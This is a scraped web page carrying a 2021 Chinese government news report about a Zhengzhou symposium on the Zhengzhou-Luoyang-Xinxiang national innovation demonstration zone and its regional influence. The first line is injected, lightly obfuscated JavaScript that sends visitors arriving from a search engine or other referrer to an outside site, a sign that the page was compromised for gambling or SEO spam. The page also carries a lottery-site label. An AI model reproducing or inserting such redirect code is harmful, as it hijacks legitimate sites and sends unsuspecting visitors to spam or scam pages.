var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

增强国家自创区辐射带动作用座谈会在郑州召开


发布日期:2021-04-21 09:10来源: 阅读次数:

  为深入贯彻落实中央经济工作会议“增强国家自主创新示范区辐射带动作用”的要求,强化国家自主创新示范区(以下简称“国家自创区”)的战略性、先导性,全面服务国家发展大局,促进区域协调发展,支撑双循环新发展格局构建,科技部成果与区域司4月9日上午在郑州召开“增强国家自创区辐射带动作用座谈会”,河南省科技厅、郑洛新国家自创区以及平顶山、焦作国家高新区等有关领导和人员参加了会议。
  河南省科技厅何守法总工程师介绍了河南省发挥郑洛新国家自创区的核心作用,辐射带动其他国家高新区和产业园区发展的做法和成效,并就当前需要解决的问题,提出了工作建议。郑州、洛阳、新乡三个片区介绍了自身发展及辐射带动情况,平顶山、焦作两个国家高新区介绍了融入郑洛新国家自创区的情况,科技部成果与区域司张勇强副司长作了总结讲话。
  自郑洛新国家自创区批复以来,河南省委、省政府积极贯彻落实国务院批复要求,推动出台了《郑洛新国家自主创新示范区条例》,按照“一顶帽子大家戴”的指导思想,有计划、分步骤部署推进辐射推广工作。经过五年的建设,构建起“3个核心园区、12个辐射园区、106个辐射点”的空间格局,有效发挥了郑洛新国家自创区的辐射带动作用。
  郑州、洛阳、新乡三个片区发挥核心优势,按照郑洛新国家自创区工作总体部署,根据自身实际,积极开展体制机制改革和政策先行先试,通过实施管理体制与人事薪酬制度改革、制定系列政策、完善“一区多园”协同发展格局等措施,激发了创新活力,提升了创新能力,提高了发展质量,增强了辐射带动能力。如郑州片区制定了“1+6+N”的政策体系,在瞪羚独角兽企业梯度培育、新型产业用地等方面,开展了前瞻性政策探索,获得了良好的效果;洛阳片区通过“一区多园”模式,为周边县区转移科技企业累计400余家,输出高新技术企业60余家,发挥了良好的带动作用;新乡片区积极探索“721”工作法,即70%的问题用服务解决,20%的问题用管理解决,10%的问题用执法解决,为营造良好的营商环境,提供了新的路径。平顶山、焦作高新区通过积极融入郑洛新国家自创区,发展明显提速,体制机制、创新环境、产业培育等方面持续优化,在国家高新区近三年的排名中,平顶山高新区提升28位,焦作高新区提升了15位。
  成果与区域司副司长张勇强在总结中,充分肯定了郑洛新国家自创区批复五年来所取得的成绩,指出在当前新的形势下,国家自创区的责任和使命更加重要,国家自创区自身不但要加强政策先行先试,进一步提高自主创新能力,还要充分发挥好辐射和带动作用。针对大家在座谈中提出的建议,会认真研究和吸纳,体现在后续的工作安排中。下一步,将会继续按照党中央、国务院的决策部署,积极会同相关部门和地方,做好国家自创区建设的顶层设计、系统谋划和扎实推进,进一步提升国家自创区建设水平,支撑世界科技强国建设。